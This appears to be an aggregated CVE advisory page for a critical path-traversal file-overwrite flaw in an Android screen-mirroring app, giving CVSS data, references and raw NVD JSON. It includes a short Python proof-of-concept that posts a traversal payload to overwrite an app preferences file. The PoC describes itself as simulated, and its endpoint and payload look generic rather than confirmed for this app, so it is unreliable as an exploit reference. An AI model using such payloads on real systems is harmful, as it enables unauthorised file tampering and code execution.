CVE-2026-30282

Description

An arbitrary file overwrite vulnerability in UXGROUP LLC Cast to TV Screen Mirroring v2.2.77 allows attackers to overwrite critical internal files via the file import process, leading to arbtrary code execution or information exposure.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:uxgroupllc:cast_to_tv:2.2.77:*:*:*:*:android:*:* - VULNERABLE

Cast to TV Screen Mirroring 2.2.77

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit(target_url):
    # Path traversal payload to overwrite a critical file
    malicious_path = "../../../../data/data/com.uxgroup.casttv/files/prefs.xml"
    
    # Simulated file upload request
    files = {'file': ('prefs.xml', b'<root><exec>malicious_command</exec></root>', 'text/xml')}
    data = {'destination': malicious_path}
    
    try:
        response = requests.post(f"{target_url}/api/upload", files=files, data=data)
        if response.status_code == 200:
            print("[+] File overwrite successful.")
        else:
            print("[-] Exploit failed.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    exploit("http://127.0.0.1:8080")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30282
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30282
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30282/
[4] VulDB https://vuldb.com/cve/CVE-2026-30282
[5] http://cast.com
[6] https://appcraze.co/
[7] https://github.com/Secsys-FDU/AF_CVEs/issues/27
[8] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30282", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:47.123", "lastModified": "2026-04-07T21:00:07.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in UXGROUP LLC Cast to TV Screen Mirroring v2.2.77 allows attackers to overwrite critical internal files via the file import process, leading to arbtrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uxgroupllc:cast_to_tv:2.2.77:*:*:*:*:android:*:*", "matchCriteriaId": "0B54F1E3-085D-43C2-BD42-4F3AE84C374A"}]}]}], "references": [{"url": "http://cast.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://appcraze.co/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/27", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}